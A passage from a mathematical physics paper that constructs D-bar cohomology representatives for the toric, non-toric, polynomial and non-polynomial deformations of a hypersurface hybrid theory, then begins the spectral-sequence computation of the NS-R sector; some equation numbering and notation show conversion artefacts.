T_{\mathcal{M}^{\text{ac}}}/\left.T_{\mathcal{M}^{\text{ac}}}\right|_ {\text{toric}}=H^{2}(V,\Omega^{1}_{V}\otimes\mathcal{O}_{V}(K_{V})). \tag{4.1}\] We will now use this characterization to find \(\overline{D}\) cohomology classes in the hybrid theory that represent each type of deformation. We will make a stronger assumption that \(V\) is smooth. This is the simplest setting for hybrid theories, since then the base degrees of freedom can be described by a smooth non-linear sigma model. The gauged linear sigma model suggests that it should be possible to extend the analysis to any simplicial NEF Fano toric variety \(V\), but we will not pursue this extension here. At any rate even assuming that \(V\) is smooth leaves us with plenty of examples with non-toric and non-polynomial deformations. ### The Lagrangian of the hypersurface hybrid Let \(L={\cal O}_{V}(K_{V})\) and take \(Y\) to be the total space of the line bundle \(L\), with projection \(\pi:Y\to V\). The fibration gives us a way to construct the action patch by patch. Suppose \(\{{\mathfrak{U}}_{a}\}_{a\in I}\) is a cover for \(V\), with \({\mathfrak{U}}_{a}\simeq{\mathbb{C}}^{4}\) with local holomorphic coordinates \(u^{i}\) and their complex conjugates \(\overline{u}^{\overline{i}}\). We can then cover \(Y\) with patches \({\mathfrak{U}}_{a}\times{\mathbb{C}}\), and denote the fiber coordinate by \(\phi\). The hybrid superfields are obtained by promoting the holomorphic coordinates just described to chiral superfields \(U^{i}\) and \(\Phi\), and their conjugates to anti-chiral superfields \(\overline{U}^{\overline{i}}\), \(\overline{\Phi}\). To make a connection with the previous description we can set \({\cal Y}^{0}=\Phi\) and \({\cal Y}^{i}=U^{i}\). To specify the hybrid action (8) we choose a superpotential \({\cal W}=\Phi P\), where \(P\) is obtained by pulling back a section of the dual bundle \(L^{*}\), and we observe that the geometry has a natural vector field \(v=\phi\frac{\partial}{\partial\phi}\) which assigns charge \(+1\) to \(\Phi\) and leaves the \(U^{i}\) invariant. Thus, if we can pick a Kahler metric for which \(v\) generates an isometry, the action will have a \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) symmetry. Moreover, the symmetry will be anomaly-free since by construction \(Y\) has a trivial canonical bundle. To describe the Kahler potential further, we pick a Hermitian metric on \(L\), that is a positive section \(h\in{\cal A}^{0,0}_{V}(L^{*}\otimes\overline{L}^{*})\). The most general Kahler potential consistent with the isometry generated by \({\cal L}_{v}\) is then \[{\cal K}={\cal K}(u,\overline{u},{\cal R})\, \tag{10}\] where \({\cal R}=\phi h(u,\overline{u})\overline{\phi}\). To leading order in the fiber direction \[{\cal K}=\phi h\overline{\phi}+{\cal K}_{\rm base}(u,\overline{u})+O({\cal R} ^{2})\, \tag{11}\] where \({\cal K}_{\rm base}\) is a Kahler potential for a Kahler metric on the base \(V\). Using the metric \(h\) we define the Chern connection \(A=\partial\log h\) on the bundle \(L\), as well as its conjugate \(\overline{A}=\bar{\partial}\log h\). These connections have Hermitian curvature \(F\in{\cal A}^{1,1}_{V}\), with \[\partial A=0\,\qquad\qquad\bar{\partial}\overline{A}=0\,\qquad\qquad\bar{ \partial}A=-\partial\overline{A}=F=F_{i\overline{j}}du^{i}\wedge d\overline{u} ^{\overline{j}}\, \tag{12}\] where \(F_{i\overline{j}}=-\partial_{\overline{j}}A_{i}\) satisfies \(\overline{F_{i\overline{j}}}=F_{i\overline{j}}\). All of these pull back to \(Y\), so that for example \(\pi^{*}(h)\) gives a metric on the pullback bundle \(L_{\rm v}=\pi^{*}(L)\). To keep the notation reasonably uncluttered we will not write the pullbacks explicitly in what follows unless it is likely to cause confusion. When derived from a linear sigma model the Kahler potential \({\cal K}\) is determined in terms of a solution to \(|\Sigma_{V}(1)|-\dim V\) algebraic equations on each affine patch, but we will not need the explicit details of this metric. We remark that in keeping with the hybrid philosophy really any choice of smooth \({\cal K}\) should do, but a canonical choice is not readily available for a general NEF Fano \(V\). If \(V\) is Fano, then we can choose \({\cal K}=\phi h\overline{\phi}+{\cal K}_{\rm base}(u,\overline{u})\) because it is possible to find a smooth metric \(h\) so that the curvature \(F\) has positive eigenvalues at every point on the base, and the resulting Kahler form is non-degenerate on \(Y\). However, for a general NEF (as opposed to ample) line bundle it is not possible to choose such a metric \(h\)[45], and this simple Kahler potential will lead to a degenerate Kahler form. Having set up this basic machinery, we will now construct representatives in the \(\overline{\cal D}\) cohomology \({\cal H}_{\overline{\cal D}}\) of the hybrid theory for each of the (a,c) and (c,c) deformations identified above. We will work at the level of classical field theory, but we expect our results to be robust at the level of the chiral algebra. ### The toric (a,c) deformations With a little more diagram chasing, it is not hard to see that the toric (a,c) deformations are described by the quotient \(H^{1}(V,\Omega^{1}_{V})/H^{1}(V,\Omega^{1}_{V}\otimes L)\), where the map \(H^{1}(V,\Omega^{1}_{V}\otimes L)\to H^{1}(V,\Omega^{1}_{V})\) is simply multiplication by \(P\). To translate this to a statement in \(\overline{\cal D}\) cohomology we define the superfield \[\Theta=\overline{\cal D}^{\prime}{\cal K}_{\phi}=({\cal K}^{\prime}+R{\cal K}^ {\prime\prime})h\left(\overline{\cal D}^{\prime}\overline{\Phi}+\left( \overline{A}_{\overline{\imath}}+\tfrac{1}{{\cal K}+{\cal K}{\cal K}^{\prime \prime}}{\cal K}^{\prime}_{\overline{\imath}}\right)\overline{\cal D}^{\prime} \overline{U}^{\overline{\imath}}\overline{\Phi}\right). \tag{4.5}\] This is useful because the equations of motion (2.11) imply \[\overline{\cal D}\Theta=-2m{\cal W}_{\phi}=-2mP. \tag{4.6}\] Now the toric deformations are described as follows. Given \([\omega]\in H^{1}(V,\Omega^{1}_{V})\) with representative \(\omega\), we set \[{\cal O}^{\rm toric}[\omega]=\omega_{i\overline{\jmath}}{\cal D}^{\prime}U^{i }\overline{\cal D}\overline{U}^{\overline{\jmath}}. \tag{4.7}\] This is clearly \(\overline{\cal D}\)-closed, and shifting \(\omega\) by a \(\bar{\partial}\)-exact form leads to a \(\overline{\cal D}\)-exact shift of \({\cal O}^{\rm ac}_{\rm toric}[\omega]\). Thus, we have a well-defined map \[{\cal O}^{\rm toric}:H^{1}(V,\Omega^{1}_{V})\rightarrow{\cal H}_{\overline{ \cal D}}. \tag{4.8}\] However, not all of these operators define non-trivial classes in \({\cal H}_{\overline{\cal D}}\): given \([\lambda]\in H^{1}(V,\Omega^{1}_{V}\otimes L)\) with representative \(\lambda\), we can construct a well-defined operator \[-\tfrac{1}{2m}\Theta\lambda_{i\overline{\jmath}}{\cal D}^{\prime}U^{i} \overline{\cal D}\overline{U}^{\overline{\jmath}} \tag{4.9}\] which satisfies \[\overline{\cal D}\left(-\tfrac{1}{2m}\Theta\lambda_{i\overline{j}}{ \cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\right)=P \lambda_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{ \overline{j}}. \tag{4.10}\] So, we characterize the toric deformations as a subset of the chiral algebra \[{\cal H}^{\rm toric}_{\overline{\cal D}}=\left\{{\cal O}^{\rm toric }[\omega]\ \ |\ \ [\omega]\in H^{1}(V,\Omega^{1}_{V})/H^{1}(V,\Omega^{1}_{V}\otimes L)\right\}. \tag{4.11}\] ### The non-toric (a,c) deformations We start with a class \([\xi]\in H^{1,2}_{\bar{\partial}}(V,L)\) with representative \(\xi\). Since \(P\xi\in{\cal A}^{1,2}_{V}\) is a \(\bar{\partial}\)-closed form, and since \(H^{2}(V,\Omega^{1}_{V})=0\), there exists \(\mu\in{\cal A}^{1,1}_{V}\) such that \[P\xi=\bar{\partial}\mu. \tag{4.12}\] Any two solutions, say \(\mu\) and \(\mu^{\prime}\), will differ by (a possibly trivial) toric deformation, i.e. \([\mu-\mu^{\prime}]\in H^{1}(V,\Omega^{1}_{V})\). Given such a \(\xi\), we would like to find a \(\overline{\cal D}\)-closed local field \({\cal O}[\xi]\) with the following properties: 1. it should be linear in \(\xi\); 2. it should have spin \(0\); 3. it should have \(q_{\rm L}=-1\); 4. it should have \(q_{\rm R}=+1\); 5. it should transform trivially from patch to patch (i.e. it should be well-defined in field space). If we limit ourselves to fields constructed from the fundamental fields and their superspace derivatives, then these requirements have a unique solution of the form \[{\cal O}_{\rm guess}=(\overline{\cal D}^{\prime}\overline{\Phi}+ \cdots)h\xi_{i\overline{j}\overline{k}}{\cal D}^{\prime}U^{i}\overline{\cal D }\overline{U}^{\overline{j}}\overline{\cal D}\overline{U}^{\overline{k}}\, \tag{4.13}\] where \(\cdots\) denotes connection terms that make the term in the parentheses transform covariantly with respect to bundle transformations. Such an improvement is exactly provided by the \(\Theta\) defined in the previous section, so that \[{\cal O}_{\rm guess}=\Theta\xi_{i\overline{j}\overline{k}}{\cal D }^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\overline{\cal D} \overline{U}^{\overline{k}}. \tag{4.14}\] Because \(\xi\) is \(\bar{\partial}\)-closed it follows that \[\overline{\cal D}{\cal O}_{\rm guess}=-2mP\xi_{i\overline{j} \overline{k}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j }}\overline{\cal D}\overline{U}^{\overline{k}}=\overline{\cal D}\left(-4m\mu_{i \overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j }}\right)\, \tag{4.15}\] where the second equality follows from our observation \(P\xi=\bar{\partial}\mu\). We conclude that the field \({\cal O}_{\rm ac}[\xi]\) defined by \[{\cal O}_{\rm ac}[\xi]=\Theta\xi_{i\overline{j}\overline{\cal E}}{ \cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\overline{ \cal D}\overline{U}^{\overline{k}}+4m\mu_{i\overline{j}}{\cal D}^{\prime}U^{i} \overline{\cal D}\overline{U}^{\overline{j}} \tag{4.16}\] is \(\overline{\cal D}\)-closed and is well-defined in \({\cal H}_{\overline{\cal D}}^{\rm ac}/{\cal H}_{\overline{\cal D}}^{\rm toric}\). In fact \({\cal O}_{\rm ac}[\xi]\) gives a well-defined map between the cohomology groups: \[{\cal O}_{\rm ac}:H^{2}(V,\Omega^{1}_{V}\otimes L)\rightarrow{ \cal H}_{\overline{\cal D}}^{\rm ac}/{\cal H}_{\overline{\cal D}}^{\rm toric}. \tag{4.17}\] It suffices to show that \({\cal O}_{\rm ac}[\bar{\partial}\eta]\) is \(\overline{\cal D}\)-exact. When \(\xi=\bar{\partial}\eta\) we can set \(\mu=P\eta\), and, using again (4.6), \[{\cal O}_{\rm ac}[\bar{\partial}\eta]=\Theta\overline{\cal D} \left(\eta_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U} ^{\overline{j}}\right)+4mP\eta_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{ \cal D}\overline{U}^{\overline{j}}=\overline{\cal D}\left(-2\Theta\eta_{i \overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j }}\right). \tag{4.18}\] So, we have a well-defined injective map \(H^{2}(V,\Omega^{1}_{V}\otimes L)\rightarrow{\cal H}_{\overline{\cal D}}^{\rm ac }/{\cal H}_{\overline{\cal D}}^{\rm toric}\), and we expect each of these \(\overline{\cal D}\)-cohomology classes to correspond to an (a,c) non-toric deformation of the IR theory. ### The polynomial deformations These deformations are understood as deformations of the chiral superpotential, and the corresponding (c,c) field is simply \[{\cal O}^{\rm poly}[f]=m\Phi f({\cal U})\, \tag{4.19}\] where \(f\in H^{0}(V,L^{*})\). While the operator is obviously \(\overline{\cal D}\)-closed and carries correct charges, some of these are also \(\overline{\cal D}\)-exact, as we see from the zeroth row of the spectral sequence computation of the (c,c) deformations above, which characterizes the polynomial deformations as \(H^{0}(V,L^{*})/H^{0}(V,T_{V})\). The map \(H^{0}(V,T_{V})\to H^{0}(V,L^{*})\) arises as follows. Let \(t\in{\cal A}^{0,0}(T_{V})\) be a holomorphic vector field. Because \(H^{1}(V,{\cal O}_{V})\) is empty the form \(t_{\ll}F=t^{i}F_{i\overline{j}}d\overline{u}^{\overline{j}}\) is \(\bar{\partial}\)-exact: \(t_{\ll}F=\bar{\partial}\eta\) for some \(\eta\in{\cal A}^{0,0}_{V}\), and there is a corresponding holomorphic vector field \(\mathbf{t}\in{\cal A}^{0,0}_{Y}(T_{Y})\) given by \[\mathbf{t}=t^{i}\left(\tfrac{\partial}{\partial u^{i}}-A_{i}v\right)- \eta v\, \tag{4.20}\] where \(v\) is the vertical holomorphic Killing vector \(v=\phi\tfrac{\partial}{\partial\phi}\). It is now easy to see that the function \(\mathbf{g}=\mathbf{t}_{\ll}\partial{\cal W}=\mathbf{t}^{\alpha}{\cal W}_{\alpha}\) is holomorphic and of the form \(\mathbf{g}=\phi g\) for a section \(g\in H^{0}(V,L^{*})\) given by \[g=-\eta P+t^{i}(P_{i}-A_{i}P). \tag{4.21}\] The map \(t\mapsto g\) is the desired map \(H^{0}(V,T_{V})\to H^{0}(V,L^{*})\), and corresponding to this we have \[\mathcal{O}^{\text{poly}}[g]=m\Phi g=\overline{\mathcal{D}}\left(- \tfrac{1}{2}\mathbf{t}^{\alpha}\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha} \right). \tag{4.22}\] ### The non-polynomial deformations The non-polynomial deformations can be understood in a more familiar geometric framework than the non-toric ones. The total space of the line bundle \(L\to V\) is a holomorphic manifold \(Y\), and given a deformation of complex structure of the base \(V\) we can ask the natural question whether the deformation can be lifted to a deformation of complex structure of \(Y\). Fortunately for us, the answer has been provided in a much wider setting in classic work from more than sixty years ago [46]: if \(\tau\) represents a class in \(H^{1}(V,T_{V})\) and \(F\) the curvature of the line bundle, we can construct \([\tau_{\sqcup}F]\in H^{2}(V,\mathcal{O}_{V})\), and \(\tau\) can be lifted to a deformation of complex structure of \(Y\) if and only if \([\tau_{\sqcup}F]=0\). Explicitly, if there exists \(\xi\in\mathcal{A}_{V}^{0,1}\) such that \[\tau_{\vec{k}}^{i}F_{i\overline{j}}-\tau_{\overline{j}}^{i}F_{i \overline{k}}=\partial_{\overline{k}}\xi_{\overline{j}}-\partial_{\overline{j} \overline{k}}\, \tag{4.23}\] then we define \(\mathbf{\tau}\in\mathcal{A}_{Y}^{0,1}(T_{Y})\) by12 Footnote 12: Note this is similar to our discussion of lifting a holomorphic vector \(t\) to a holomorphic vector \(\mathbf{t}\) on \(Y\). \[\mathbf{\tau}=\left(\xi_{\overline{j}}v+\tau_{\overline{j}}^{i}\left( \tfrac{\partial}{\partial u^{i}}-A_{i}v\right)\right)\otimes d\overline{u}^{ \overline{j}}. \tag{4.24}\] It is easy to check that \(\bar{\partial}\mathbf{\tau}=0\). In our case \(\xi\) exists because \(H^{2}(V,\mathcal{O}_{V})=0\). Moreover, if \(\tau=\bar{\partial}\rho\) for some \(\rho\in\mathcal{A}_{V}^{0,0}(T_{V})\), then we can set \(\xi_{\overline{j}}=\rho^{i}F_{i\overline{j}}\), and in this case \(\mathbf{\tau}\) is \(\bar{\partial}\)-exact: \[\mathbf{\tau}=\bar{\partial}\mathbf{\rho}\, \mathbf{\rho}=\rho^{i}\left(\tfrac{\partial}{\partial u^{i}}-A_{i}v \right). \tag{4.25}\] Thus, we have a well-defined map on cohomology: \(H^{1}(V,T_{V})\to H^{1}(Y,T_{Y})\). Using the map \(\tau\mapsto\mathbf{\tau}\) and a little bit of foresight, we make an Ansatz for the corresponding (c,c) field: \[\mathcal{O}_{\text{cc}}[\tau]=\mathbf{\tau}_{\overline{\beta}}^{ \alpha}\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\,\overline{ \mathcal{D}}\overline{\mathcal{V}}^{\overline{\beta}}+2m\mathbf{f}\, \tag{4.26}\] where \(\mathbf{f}\) is a function on \(Y\); we will choose \(\mathbf{f}\) presently. We then calculate, using (2.11), \[\overline{\mathcal{D}}\mathcal{O}_{\text{cc}}[\tau]=2m\left(\Phi f _{\overline{\beta}}-\mathbf{\tau}_{\overline{\beta}}^{\alpha}\mathcal{W}_{\alpha} \right)\overline{\mathcal{D}}\overline{\mathcal{V}}^{\overline{\beta}}. \tag{4.27}\] Since \(\mathcal{W}\) is a well-defined function on \(Y\), \[\mathbf{\tau}_{\sqcup}\partial\mathcal{W}=\mathbf{\tau}_{\overline{\beta}}^{\alpha} \mathcal{W}_{\alpha}d\overline{y}^{\overline{\beta}}\in\mathcal{A}_{Y}^{0,1}\, \tag{4.28}\] and explicitly it is given by \[\mathbf{\tau}_{\perp}\partial\mathcal{W}=\phi\lambda\, \tag{110}\] where \[\lambda=\left(\xi_{\overline{\jmath}}P+\tau^{i}_{\overline{\jmath}}(P_{i}-A_{i}P )\right)d\overline{u}^{\overline{\jmath}}\in\mathcal{A}^{0,1}_{V}(L^{*}) \tag{111}\] is \(\bar{\partial}\)-closed by (108). Furthermore, (10) implies \(H^{1}(V,L^{*})=0\), which means \(\lambda=\bar{\partial}\sigma\) for some \(\sigma\in\mathcal{A}^{0,0}_{V}(L^{*})\). Putting these results together it follows that \[\mathbf{\tau}_{\perp}\partial\mathcal{W}=\bar{\partial}(\phi\sigma)\, \tag{112}\] so that choosing \(\mathbf{f}=\phi\sigma\) leads to a \(\overline{\mathcal{D}}\)-closed field \[\mathcal{O}_{\rm cc}[\tau]=\mathbf{\tau}_{\overline{\beta}}^{\alpha} \overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\,\overline{\mathcal{D}} \overline{\mathcal{Y}}^{\overline{\beta}}+2m\mathbf{f}. \tag{113}\] The choice of \(\sigma\) is ambiguous up to shifts by elements of \(H^{0}(V,T_{V}^{*})\). Just as in the preceding discussion of the non-toric deformations, this means \(\mathcal{O}_{\rm cc}[\tau]\) is well-defined in the quotient \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}/\mathcal{H}_{\overline{ \mathcal{D}}}^{\rm poly}\). It remains to show that this gives a well-defined map on cohomology: \[\mathcal{O}_{\rm cc}:H^{1}(V,T_{V})\to\mathcal{H}_{\overline{ \mathcal{D}}}^{\rm cc}/\mathcal{H}_{\overline{\mathcal{D}}}^{\rm poly}\, \tag{114}\] and it suffices to check that \(\mathcal{O}_{\rm cc}[\bar{\partial}\rho]\) is \(\overline{\mathcal{D}}\)-exact. But, since \(\tau=\bar{\partial}\rho\) implies \(\mathbf{\tau}=\bar{\partial}\mathbf{\rho}\), we set \(\mathbf{f}=\mathbf{\rho}_{\perp}\partial\mathcal{W}=\mathbf{\rho}^{\alpha}\mathcal{W}_{\alpha}\), and using again (10) \[\overline{\mathcal{D}}\left(-\mathbf{\rho}^{\alpha}\overline{\mathcal{D}}^{\prime }\mathcal{K}_{\alpha}\right)=\mathbf{\tau}_{\overline{\beta}}^{\alpha}\,\overline {\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\,\overline{\mathcal{D}}\overline{ \mathcal{Y}}^{\overline{\beta}}-\mathbf{\rho}^{\alpha}\overline{\mathcal{D}}\, \overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}=\mathcal{O}_{\rm cc}[\bar {\partial}\tau]. \tag{115}\] ## 5 The NS-R sector of the hypersurface hybrid We now discuss the computation of the marginal deformations in the NS-R sector of the hybrid theory. That is, assuming the hybrid theory flows to a compact SCFT, we know that every right-moving chiral primary operator has an image as a right-moving ground state in the NS-R sector. Using the technology developed in [22] it is possible to compute all the states that correspond to massless spacetime fermions in a string compactification based on the SCFT. A subset of these states, those with \(q_{\rm L}=\pm 1\) and \(h_{\rm L}=1/2\), is isomorphic to the marginal deformations in the NS-NS sector. Since the left-moving weights can be calculated using the chiral algebra, this gives an effective way to check our results and to also check that the techniques of [22] really do apply to hypersurface hybrids. We will see that the deformations are captured by the cohomology of the right moving supercharge \(\overline{\mathbf{Q}}\), which in the hybrid decomposes into the sum of two anticommuting operators: \(\overline{\mathbf{Q}}_{0}\), the supercharge of the base NLSM, and \(\overline{\mathbf{Q}}_{W}\), the supercharge contribution from the inclusion of the superpotential \({\cal W}=\Phi P\). The (2,2) superfields are decomposed into their (0,2) components, \[{\cal Y}^{\alpha} =Y^{\alpha}+\sqrt{2}\theta^{\prime}{\cal X}^{\alpha}+\theta^{\prime }\overline{\theta}^{\prime}\partial Y^{\alpha}, \overline{\cal Y}^{\overline{\alpha}} =\overline{Y}^{\overline{\alpha}}-\sqrt{2}\overline{\theta}^{ \prime}\overline{\cal X}^{\overline{\alpha}}-\theta^{\prime}\overline{\theta}^ {\prime}\partial\overline{Y}^{\overline{\alpha}}\] \[Y^{\alpha} =y^{\alpha}+\sqrt{2}\theta\eta^{\alpha}+\theta\overline{\theta} \bar{\partial}y^{\alpha}, \overline{Y}^{\alpha} =\overline{y}^{\overline{\alpha}}-\sqrt{2}\overline{\theta} \overline{\eta}^{\overline{\alpha}}-\theta\overline{\theta}\bar{\partial} \overline{y}^{\overline{\alpha}}\] \[{\cal X}^{\alpha} =\chi^{\alpha}+\sqrt{2}\theta H^{\alpha}+\theta\overline{\theta} \bar{\partial}\chi^{\alpha}, \overline{\cal X}^{\overline{\alpha}} =\overline{\chi}^{\overline{\alpha}}+\sqrt{2\overline{\theta}H^{ \alpha}}-\theta\overline{\theta}\bar{\partial}\overline{\chi}^{\overline{ \alpha}} \tag{109}\] We identify \(y^{\alpha}\) as coordinates on the total space \(Y\) and decompose these into \((\phi,u^{i})\) as above. For the other component fields, we denote the fiber component with a 0 superscript or subscript. We use the equations of motion to eliminate the auxiliary fields and then make the following field redefintions, \[\overline{\chi}_{\alpha}={\cal G}_{\alpha\overline{\beta}}\overline{\chi}^{ \overline{\beta}},\qquad\rho_{\alpha}={\cal G}_{\alpha\overline{\alpha}} \partial y^{\alpha}+\Gamma^{\delta}_{\alpha\beta}\overline{\chi}_{\delta}\chi ^{\beta}. \tag{110}\] As described in [22], in the large radius limit these degrees of freedom can be treated as a free curved \(bc\)-\(\beta\gamma\) system, while the right-moving degrees of freedom are taken in their ground states. A general state in the \(\overline{\bf Q}\) cohomology in the NS-R sector is represented of a \((0,k)\) form \(\Psi\) valued in a product bundle \((T^{*}_{Y})^{\otimes s}\otimes(T_{Y})^{\otimes t}\) contracted into \(k\) copies of the zero modes \(\overline{\eta}^{\bar{i}}\) and a combination of \(\chi^{\alpha}\), \(\overline{\chi}_{\alpha}\), and \(\rho_{\alpha}\). The charges and weights of the fields are given in the table below, and this allows us to select the states that correspond to the marginal deformations. \begin{tabular}{|c|c|c|c|c|c|c|c|c|} \hline & \(u^{i}\) & \(\rho_{i}\) & \(\chi^{i}\) & \(\overline{\chi}_{i}\) & \(\phi\) & \(\rho_{0}\) & \(\chi^{0}\) & \(\overline{\chi}_{0}\) \\ \hline \(q_{\rm L}\) & 0 & 0 & \(-1\) & 1 & 1 & \(-1\) & 0 & 0 \\ \hline \(q_{\rm R}\) & 0 & 0 & 0 & 0 & 1 & \(-1\) & 1 & \(-1\) \\ \hline \(2h_{\rm L}\) & 0 & 2 & 1 & 1 & 1 & 1 & 2 & 0 \\ \hline \end{tabular} ### (a,c) Deformations Given these, we construct the most general set of operators obeying our charge and weight constraints. The corresponding states are then constructed by letting these act on the NS-R Fock vacuum. Starting with the (a,c) deformations, we find operators and the eigenvalue of their coefficients \(\Psi\) under the Lie derivative \({\cal L}_{v}\) that can contribute to NS-R states with \(q_{\rm L}=-1\): \[{\cal O}^{2} =\Psi_{\alpha}^{2}\chi^{\alpha}\, \qquad{\cal O}^{5} =\Psi_{\alpha}^{5,\beta}\overline{\chi}_{\beta}\chi^{\alpha}\, \qquad{\cal O}^{6} =\Psi^{6,\beta}\rho_{\beta}+\Psi_{\alpha}^{6,\beta}\overline{ \chi}_{\beta}\chi^{\alpha}\, \qquad{\cal O}^{7} =\Psi^{7,\alpha\beta}\rho_{\alpha}\overline{\chi}_{\beta}\,\] \[{\cal L}_{v}\Psi^{2} =0\, \qquad{\cal L}_{v}\Psi^{5} =-\Psi^{5}\, \qquad{\cal L}_{v}\Psi^{6} =-\Psi^{6}\, \qquad{\cal L}_{v}\Psi^{7} =-2\Psi^{7}\.\] The coefficients \(\Psi\) are sections of the following bundles, \[\Psi^{2}\in\mathcal{A}_{Y}^{0,u}(T_{Y}^{*})\,\quad\Psi^{5}\in\mathcal{A}_{Y}^{0,u} (T_{Y}^{*}\otimes T_{Y})\,\quad\Psi^{6}\in\mathcal{A}_{Y}^{0,u}(T_{Y})\,\quad\Psi^{7}\in \mathcal{A}_{Y}^{0,u}(T_{Y}\otimes T_{Y}). \tag{100}\] By utilizing the decomposition \(\overline{\mathbf{Q}}=\overline{\mathbf{Q}}_{0}+\overline{\mathbf{Q}}_{W}\), we can compute the cohomology via a spectral sequence with zeroth stage \(d_{0}=\overline{\mathbf{Q}}_{0}\) and first stage \(d_{1}=\overline{\mathbf{Q}}_{W}\). We start by taking the \(d_{0}=\overline{\mathbf{Q}}_{0}\) cohomology, which acts on the component fields as \(\overline{\mathbf{Q}}_{0}=-\overline{\eta}^{i}\frac{\partial}{\partial\overline {u}}\) and thus forces the \(\Psi\) into cohomology groups \(H^{u}(Y,(T_{Y}^{*})^{\otimes s}\otimes(T_{Y})^{\otimes t})\), which we will shorten on the diagram to \(H^{u}(B_{s,t})\). To organize these states into a complex, we define \(p=q_{\rm R}-u\), and parameterize the complex by \((p,u)\). Below we have the first page of the spectral sequence, \[\begin{CD}0@>{}>{H^{3}(Y,B_{0,2})}>{H^{3}(Y,B_{1,1})\oplus H^{3}(Y,B_{0,1})} >H^{3}(Y,B_{1,0})&0\\ 0@>{}>{H^{2}(Y,B_{0,2})}>{H^{2}(Y,B_{1,1})\oplus H^{2}(Y,B_{0,1})}>{H^{2}(Y,B _{1,0})}>0\\ 0@>{}>{H^{1}(Y,B_{0,2})}>{H^{1}(Y,B_{1,1})\oplus H^{1}(Y,B_{0,1})}>{H^{1}( \tilde{Y},\mathcal{B}_{1,0})}>0\\ 0@>{}>{H^{0}(Y,B_{0,2})}>{H^{0}(Y,B_{1,1})\oplus H^{0}(Y,B_{0,1})}>{H^{0}(Y,B _{1,0})}>0\\ \end{CD}\] The states we are after correspond to \(q_{\rm R}=1\), which is denoted by the dashed line. Before applying the \(d_{1}\) stage of the sequence, we make use of the sheaf cohomology results developed in appendix C of [22]. Given a section of a bundle \(\mathcal{E}\) on \(Y\) at fixed grade \(r\) in \(\phi\), we are able to find an isomorphic bundle on \(V\) in cohomology. Each of the relevant bundles on \(Y\) will have a corresponding exact sequence relating the base and fiber components of the bundle. For instance, consider the sequence for \(T_{Y}^{*}\), \[\begin{CD}0@>{}>{(\pi^{*}(T_{V}^{*}))_{r}}>{(T_{Y}^{*})_{r}}>{(\pi^{*}(L^{-1} ))_{r-1}}>0\end{CD} \tag{101}\] We wish to evaluate this sequence at grade \(r=0\), i.e. the eigenvalue of \(\Psi^{2}\) under \(\mathcal{L}_{v}\). This tells us that \(T_{Y}^{*}\) at grade \(0\) is equivalent to the pullback of \(T_{V}^{*}\), which after taking cohomology allows us to use the isomorphism \[H_{r}^{\bullet}(Y,\pi^{*}(\mathcal{E}))\simeq H^{\bullet}(B,\mathcal{E} \otimes L^{-r}) \tag{102}\] to obtain \[H_{0}^{\bullet}(Y,T_{Y}^{*})=H^{\bullet}(V,T_{V}^{*}) \tag{103}\] We carry this exercise out for the remaining bundles, and are able to reduce the first page of the spectral sequence to \[0\qquad H^{3}(V,L^{2})\qquad H^{3}(V,T_{V}^{*}\otimes L)\oplus H^{3} (V,L)\qquad H^{3}(V,T_{V}^{*})\quad 0\] \[0\qquad H^{2}(V,L^{2})\qquad H^{2}(V,T_{V}^{*}\otimes L)\oplus H^{2 }(V,L)\qquad H^{2}(V,T_{V}^{*})\quad 0\] \[0\qquad H^{1}(V,L^{2})\qquad H^{1}(V,T_{V}^{*}\otimes L)\oplus H^{ 1}(V,L)\qquad H^{1}(V,T_{V}^{*})\quad 0\] \[0\qquad H^{0}(V,L^{2})\qquad H^{0}(V,T_{V}^{*}\otimes L)\oplus H^{ 0}(V,L)\qquad H^{0}(V,T_{V}^{*})\quad 0\] From here, we can make use of various vanishing theorems and Serre duality for the cohomology of vector bundles on toric varieties. The new complex then takes the form \[0\qquad 0\qquad H^{3}(V,T_{V}^{*}\otimes L)\qquad 0\qquad 0\] \[0\qquad 0\qquad H^{2}(V,T_{V}^{*}\otimes L)\qquad 0\qquad 0\] \[0\qquad 0\qquad H^{1}(V,T_{V}^{*}\otimes L)\qquad\qquad H^{1}(V,T_{V}^{*}) \quad 0\] \[0\qquad 0\qquad H^{0}(V,T_{V}^{*}\otimes L)\oplus H^{0}(V,L)\qquad 0 \qquad 0\] Ultimately, we are interested in the cohomology along the diagonal corresponding to \(q_{\text{\tiny R}}=1\). So, we can zoom into the relevant parts and consider the \(d_{1}=\overline{\mathbf{Q}}_{W}\) map, \[\begin{array}{ccc}H^{2}(V,T_{V}^{*}\otimes L)&\xrightarrow{\overline{\mathbf{Q} }_{W}}&0\\ H^{1}(V,T_{V}^{*}\otimes L)&\xrightarrow{\overline{\mathbf{Q}}_{W}}&H^{1}(V,T_{V} ^{*})\\ \hline\end{array}\] The \(\overline{\mathbf{Q}}_{W}\) action on the component fields is given by \[\overline{\mathbf{Q}}_{W}\cdot\overline{\chi}_{\alpha}=W_{\alpha},\quad \overline{\mathbf{Q}}_{W}\cdot\rho_{\alpha}=\chi^{\beta}W_{\beta\alpha} \tag{5.8}\] and thus the \(\overline{\mathbf{Q}}_{W}\) map quotients out elements of \(H^{1}(V,T_{V}^{*}\otimes L)\) multiplied by \(P\) from \(H^{1}(V,T_{V}^{*})\). and acts by \(0\) on \(H^{2}(V,T_{V}^{*}\otimes L)\). So, the terminal stage of the spectral sequence converges to the cohomology of \(\overline{\mathbf{Q}}\), giving \[\begin{array}{ccc}H^{2}(V,T_{V}^{*}\otimes L)&0\\ H^{1}(V,T_{V}^{*}\otimes 